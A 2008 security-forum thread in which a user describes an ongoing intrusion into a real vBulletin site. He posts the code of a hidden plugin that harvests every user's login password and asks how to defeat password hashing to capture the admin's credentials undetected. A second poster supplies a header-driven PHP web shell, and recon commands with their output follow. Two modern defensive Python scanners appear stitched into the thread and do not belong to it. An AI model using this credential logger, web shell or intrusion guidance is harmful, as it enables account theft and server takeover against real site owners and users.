IT Security and Insecurity Portal |

Need help finishing the job :D

Posted: Wed Sep 17, 2008 4:08 am
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

Hi everybody.
I've hacked a very large vBulletin-powered site.
I'm knowledgeable in PHP, MySQL, etc.
I have access to phpMyAdmin using the username/password from the config.php file, and I have installed my own little "swiss army knife" script so I can manipulate things from a script perspective.
I do NOT have FTP access
I do know, however, that the Admin of the site uses the same password for everything, so if I can manage to catch his password as he logs in, I will have complete control over the entire server (it's a dedicated rig; I'm able to browse the root of the machine using my script, although obviously my permissions are limited, since I'm running as the PHP user).
I've unobtrusively installed a plugin which catches all logins - here's what the plugin code and save table look like:
Plugin:
Code:
$vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (userid, username, password, password_md5, password_md5_utf, ipaddress) VALUES (" . $vbulletin->userinfo['userid'] . ", '" . $vbulletin->db->escape_string($vbulletin->userinfo['username']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password_utf']) . "', '" . $vbulletin->db->escape_string(IPADDRESS) . "' )");
Table:
Code:
CREATE TABLE `loginz` (
`logid` int(10) NOT NULL auto_increment,
`userid` int(10) NOT NULL default '0',
`username` varchar(100) NOT NULL default '',
`password` varchar(255) NOT NULL,
`password_md5` varchar(255) NOT NULL,
`password_md5_utf` varchar(255) NOT NULL,
`ipaddress` varchar(15) NOT NULL default '',
`date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
PRIMARY KEY (`logid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
What I need to know is: How can I disable the automatic MD5-ing of the password by the JavaScript in the login form?
I know that this line:
Code:
define('DISABLE_PASSWORD_CLEARING', true);
works to do that if it's in the config.php file, but can it be implemented via a plugin?
If not, is there a way I can disable just the JavaScript in the login form (I want to remain relatively undetected, so I won't turn off AJAX for the entire site, even though there is an option for that)?
Any help regarding this will be very much appreciated, and I thank you in advance.
ayvegh

Posted: Wed Sep 17, 2008 5:29 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Try the password for MySQL on FTP, the admin panel, etc. If you don't have a shell, upload some small shell on the server and look; maybe this guy has other sites on this server. Search admin panels, passwords, other databases, etc. You need to get owner level and then you can edit the login.php and catch the password.

Posted: Wed Sep 17, 2008 5:55 am
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

koko wrote: Try password for mysql to ftp,admin panel ..etc.If you don't have shell upload some small shell on server and look maybe this guy have other sites on this server.Search admin panel's,passwords,other databases ....etc.You need to get owner level and then you can edit the login.php and catch password.
I know one of the Admin's passwords, the other one that he uses everywhere.
It's not the same on here, and the MySQL password is randomly generated.
I've gone through every other site hosted on the server; none of them are even live anymore, and none of them have valid password data in them.
What do you mean by "shell"? Do you have any sample shell scripts I could look at?

Posted: Wed Sep 17, 2008 7:07 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Something like
Code:
<?php $footer = @getenv('HTTP_FOOTER'); if($footer) {@passthru($footer); exit;} ?>
Working with headers
FOOTER:ls -al
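From the defender's side, both artifacts in this thread so far (a plugin that copies the submitted login secret into a table, and a one-line PHP file that runs whatever arrives in a request header) can be caught by a static check over plugin code and over PHP files in the web root. The script below is an added example, not code from this thread or from vBulletin; it assumes vBulletin's `vb_login_*` request keys and `query_write` call as they appear in the posted plugin, and the sample snippets it scans are constructed to mirror the two posts.

```python
"""Static checks over PHP snippets for the two things this thread shows: a
vBulletin plugin that persists the submitted login secret, and a PHP file that
runs shell commands taken from client-controlled input. The sample snippets
below are constructed for this example."""
from __future__ import annotations
import re

# Request keys that carry the login secret in vBulletin's login flow.
LOGIN_SECRET_KEYS = (
    "vb_login_password",
    "vb_login_md5password",
    "vb_login_md5password_utf",
)
# Calls that can persist or send a captured value somewhere.
PERSIST_PATTERN = re.compile(
    r"query_write|INSERT\s+INTO|mysql_query|file_put_contents|fwrite|mail\s*\(",
    re.IGNORECASE,
)
# PHP functions that hand a string to the system shell.
SHELL_FUNCS = ("passthru", "shell_exec", "exec", "system", "popen", "proc_open")
# Inputs an HTTP client controls directly: query/body/cookie values, or any
# request header, which PHP exposes as HTTP_* environment variables.
TAINT_SOURCES = (
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b",
    r"getenv\s*\(\s*['\"]HTTP_",
    r"\$_SERVER\s*\[\s*['\"]HTTP_",
)

# Constructed samples (assumed plugin bodies and files, not real site code).
PLUGIN_LOGGER = r"""$vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (userid, password, password_md5, password_md5_utf) VALUES (" . $vbulletin->userinfo['userid'] . ", '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password_utf']) . "')");"""
BENIGN_PLUGIN = r"""$vbulletin->db->query_write("UPDATE " . TABLE_PREFIX . "user SET lastactivity = " . TIMENOW . " WHERE userid = " . $vbulletin->userinfo['userid']);"""
WEBSHELL = r"""<?php $footer = @getenv('HTTP_FOOTER'); if($footer) {@passthru($footer); exit;} ?>"""
BENIGN_EXEC = r"""<?php $out = shell_exec('/usr/bin/convert upload.png thumb.jpg'); ?>"""
SAMPLES = {
    "plugin_logger": PLUGIN_LOGGER,
    "plugin_benign": BENIGN_PLUGIN,
    "webshell": WEBSHELL,
    "exec_benign": BENIGN_EXEC,
}


def find_credential_persistence(php: str) -> list[str]:
    """Return the login-secret request keys a snippet reads while also calling
    something that can write or send data; a plugin has no reason to do both."""
    if not PERSIST_PATTERN.search(php):
        return []
    return [k for k in LOGIN_SECRET_KEYS if re.search(r"\b" + re.escape(k) + r"\b", php)]


def find_command_execution(php: str) -> list[str]:
    """Return the shell-execution functions called in a snippet that also reads
    client-controlled input (a fixed command string alone is not flagged)."""
    if not any(re.search(src, php) for src in TAINT_SOURCES):
        return []
    return [fn for fn in SHELL_FUNCS if re.search(r"\b" + fn + r"\s*\(", php)]


def scan(snippets: dict[str, str]) -> dict[str, list[str]]:
    """Run both checks; maps each snippet name to its findings, omitting clean ones."""
    report: dict[str, list[str]] = {}
    for name, code in snippets.items():
        findings = [f"persists login secret {k}" for k in find_credential_persistence(code)]
        findings += [f"shell call {fn}() reachable from client input"
                     for fn in find_command_execution(code)]
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name)
        for f in findings:
            print("  -", f)
```

In a real vBulletin install the plugin bodies live in the `plugin` table's `phpcode` column, so the same functions can be run over each row there, and over every `.php` file under the web root for the second check; anything flagged deserves a diff against a known-good copy rather than a guess about intent.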

Posted: Wed Sep 17, 2008 11:49 pm
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

Hmm... now I'm really confused.
I have read-only access to the root of the filesystem.
What would that script accomplish?
Many thanks,
ayvegh

Posted: Thu Sep 18, 2008 5:23 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

ayvegh wrote: Hmm... now I'm really confused.
I have read-only access to the root of the filesystem.
What would that script accomplish?
Many thanks,
ayvegh
This shell doesn't give you root perms: nobody or apache, or in the best case owner/owner.
Try FOOTER:id

Posted: Fri Sep 19, 2008 4:26 am
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

I hate to sound like such a noob, but I have two questions:
1. What are you trying to accomplish with these shell scripts?
2. How do I use these scripts? <?php exec(); ?> ?
Thanks again,
ayvegh

Posted: Fri Sep 19, 2008 5:32 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

ayvegh wrote: I hate to sound like such a noob, but I have two questions:
1. What are you trying to accomplish with these shell scripts?
2. How do I use these scripts? <?php exec(); ?> ?
Thanks again,
ayvegh
1. Social engineering.
2. Only like this: <?php @exec('cmd'); ?>
Working with POST cmd=ls -al

Posted: Fri Sep 19, 2008 5:54 am
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

Hmm... that's not any form of social engineering I know of, but hey, I'm the noob here, right?
Okay, so I ran this code from my location in the web directory:
Code:
$output = NULL;
@exec("ls -al /", $output);
print_r($output);
And got this output:
Code:
Array
(
[0] => total 125
[1] => drwxr-xr-x 22 root root 4096 2007-05-08 12:21 .
[2] => drwxr-xr-x 22 root root 4096 2007-05-08 12:21 ..
[3] => drwxr-xr-x 2 root root 4096 2008-06-01 09:17 bin
[4] => drwxr-xr-x 4 root root 1024 2008-06-01 09:18 boot
[5] => lrwxrwxrwx 1 root root 11 2007-05-08 12:16 cdrom -> media/cdrom
[6] => drwxr-xr-x 13 root root 3900 2008-04-02 06:47 dev
[7] => drwxr-xr-x 72 root root 4096 2008-06-01 09:19 etc
[8] => drwxr-xr-x 6 root root 4096 2007-07-01 14:59 home
[9] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 initrd
[10] => lrwxrwxrwx 1 root root 28 2007-05-08 12:18 initrd.img -> boot/initrd.img-2.6.18-4-686
[11] => drwxr-xr-x 12 root root 12288 2008-06-01 09:17 lib
[12] => drwx------ 2 root root 16384 2007-05-08 12:14 lost+found
[13] => drwxr-xr-x 3 root root 4096 2007-05-08 12:16 media
[14] => drwxr-xr-x 2 root root 4096 2006-10-28 16:06 mnt
[15] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 opt
[16] => dr-xr-xr-x 183 root root 0 2008-04-02 06:46 proc
[17] => drwxr-xr-x 11 root root 4096 2008-06-18 14:24 root
[18] => drwxr-xr-x 2 root root 4096 2008-06-01 09:17 sbin
[19] => drwxr-xr-x 2 root root 4096 2007-03-07 23:56 selinux
[20] => drwxr-xr-x 2 root root 4096 2007-05-08 12:17 srv
[21] => drwxr-xr-x 11 root root 0 2008-04-02 06:46 sys
[22] => drwxrwxrwt 21 root root 36864 2008-09-19 07:47 tmp
[23] => drwxr-xr-x 11 root root 4096 2007-05-10 18:32 usr
[24] => drwxr-xr-x 14 root root 4096 2007-05-10 18:31 var
[25] => lrwxrwxrwx 1 root root 25 2007-05-08 12:18 vmlinuz -> boot/vmlinuz-2.6.18-4-686
)
What does that do for me, aside from telling me that I can't do much in the root directory (unless I'm reading those chmod letters wrong)?
Thanks again,
ayvegh

Posted: Fri Sep 19, 2008 6:30 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Try with pwd
Then ls -al /bla/bla/ from pwd result

Posted: Fri Sep 19, 2008 6:12 pm
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

Okay, so I've refined my code a bit:
Code:
print_r(shell_exec('pwd'));
All that gives me is the directory string of where my script is located:
Code:
/var/www/[redacted]/www/[redacted]
Doing this:
Code:
print_r(shell_exec('ls -al ' . shell_exec('pwd')));
Gives me the directory listing for my script's location, which looks like this:
Code:
total 124
drwxrwxrwx 2 10001 www-data 4096 2008-09-15 08:02 .
drwxr-xr-x 26 10001 www-data 4096 2008-09-01 15:59 ..
-rw-r--r-- 1 10001 www-data 1848 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 6664 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 0 2008-04-25 20:50 index.html
-rw-r--r-- 1 www-data www-data 6099 2008-09-15 08:01 redacted.php <-- My script, created using an exploit in the ACP ;)
-rw-r--r-- 1 10001 www-data 7223 2006-11-24 10:26 redacted.php
-rw-r--r-- 1 10001 www-data 5689 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 2108 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 2819 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 30243 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 7633 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 1659 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 1098 2005-09-16 05:00 redacted.php
-rw-r--r-- 1 10001 www-data 10754 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 3443 2008-04-25 20:50 redacted.php
-rw-r--r-- 1 10001 www-data 534 2006-04-05 05:00 redacted.php
-rw-r--r-- 1 10001 www-data 4032 2008-04-25 20:50 welcomeblock.php
But I have all of that information already, as I said.
The "My script" highlighted above is what I'm using to execute these commands.
It has a built-in filebrowser/downloader (I'm adding zipping and maybe RAR functions soon), and a code executor, inputted via the address bar in Base64.
So what does this do for me?
Thanks again for your patience,
ayvegh
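The listing above is worth reading the way an administrator would: the directory itself is `drwxrwxrwx` (world-writable, so the web-server process can create files in it), every legitimate file is owned by the deploy account (uid 10001), and the one foreign file is owned by `www-data`, the user PHP runs as. Those two conditions together are exactly how a dropped script ends up beside the site's own code. The script below is an added example, not code from this thread; it parses `ls -al` output in the format shown above and reports both conditions, plus group-writable entries whose group is the web-server user. The listing it audits is constructed for the example, with uid 10001 as the deploy account and `www-data` as the server user, as on this page.

```python
"""Audit an `ls -al` listing of a web root for entries the web-server process
owns or can write to. The listing below is constructed for this example."""
from __future__ import annotations
import re
from dataclasses import dataclass

# mode, link count, owner, group, size, date, time, name (GNU ls -al layout)
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+(?P<name>.+)$"
)

# Constructed listing: deploy account uid 10001, server running as www-data.
SAMPLE_LISTING = """\
total 124
drwxrwxrwx 2 10001 www-data 4096 2008-09-15 08:02 .
drwxr-xr-x 26 10001 www-data 4096 2008-09-01 15:59 ..
-rw-r--r-- 1 10001 www-data 1848 2008-04-25 20:50 index.php
-rw-r--r-- 1 www-data www-data 6099 2008-09-15 08:01 dropped.php
-rw-rw-r-- 1 10001 www-data 4032 2008-04-25 20:50 welcomeblock.php
"""


@dataclass
class Entry:
    mode: str
    owner: str
    group: str
    name: str

    @property
    def is_dir(self) -> bool:
        return self.mode[0] == "d"

    def writable_by(self, who: str) -> bool:
        # mode string is: type, then rwx for user, group, other
        idx = {"user": 2, "group": 5, "other": 8}[who]
        return self.mode[idx] == "w"


def parse_listing(text: str) -> list[Entry]:
    """Parse the entry lines of an `ls -al` listing; the 'total' line is skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            entries.append(Entry(m["mode"], m["owner"], m["group"], m["name"]))
    return entries


def audit(text: str, web_user: str = "www-data") -> list[str]:
    """Report entries the web-server user owns or could modify."""
    findings = []
    for e in parse_listing(text):
        if e.name == "..":
            continue  # the parent directory lies outside the audited tree
        kind = "dir" if e.is_dir else "file"
        if e.writable_by("other"):
            findings.append(f"world-writable {kind}: {e.name}")
        elif e.group == web_user and e.writable_by("group"):
            findings.append(f"{kind} writable by web-server group {web_user}: {e.name}")
        if e.owner == web_user:
            findings.append(f"{kind} owned by web-server user {web_user}: {e.name}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LISTING):
        print(finding)
```

The fix that follows from a hit is the usual one: application directories owned by the deploy account and mode 755 (directories) or 644 (files), with the server user granted write access only to the few upload and cache paths that need it, and those paths configured so PHP is not executed from them.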

Posted: Fri Sep 19, 2008 8:13 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Posted: Fri Sep 19, 2008 8:26 pm
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

Code:
print_r(shell_exec('id'));
gives
Code:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Posted: Sat Sep 20, 2008 8:12 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Show me
ls -al /var/www/[redacted]/www/

Posted: Sun Sep 21, 2008 2:07 am
ayvegh
Regular user
Joined: Sep 17, 2008
Posts: 12

koko wrote: Show me
ls -al /var/www/[redacted]/www/
No need to post the whole thing; here's a directory and a file:
Code:
total 3110
drwxr-xr-x 4 10001 www-data 4096 2008-09-01 16:18 admincp
-rw-r--r-- 1 10001 www-data 39174 2008-01-27 01:00 global.php
Having seen the FTP users database (and unsuccessfully adding a user), I can tell you that userid 10001 is the Admin's FTP account.
Any way to reverse MySQL PASSWORD() hashing?

www.waraxe.us Forum Index -> vBulletin Board
Page 1 of 2

Powered by phpBB © 2001-2008 phpBB Group